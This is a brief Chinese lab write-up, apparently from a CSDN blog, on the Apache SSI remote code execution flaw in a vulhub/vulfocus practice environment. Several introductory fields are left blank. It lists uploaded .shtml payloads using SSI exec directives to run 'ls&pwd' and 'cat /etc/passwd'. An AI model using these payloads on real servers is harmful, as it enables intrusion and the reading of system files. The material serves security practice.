服务器容器漏洞-apache ssi-rce

(191条消息) vulhub-httpd-ssi-rce_vulfocus/httpd-ssi_浅陌.的博客-CSDN博客

1、介绍

名称：apache ssi-rce漏洞

编号：

原理：

应用：apache

版本：

2、测试

2.1 靶场搭建

2.2 测试过程

(1)上传shell.shtml

<!--#exec cmd="ls&pwd"-->

(2)上传新的shl.shtml，出现密码说明远程代码执行成功

<!--#exec cmd="cat /etc/passwd"-->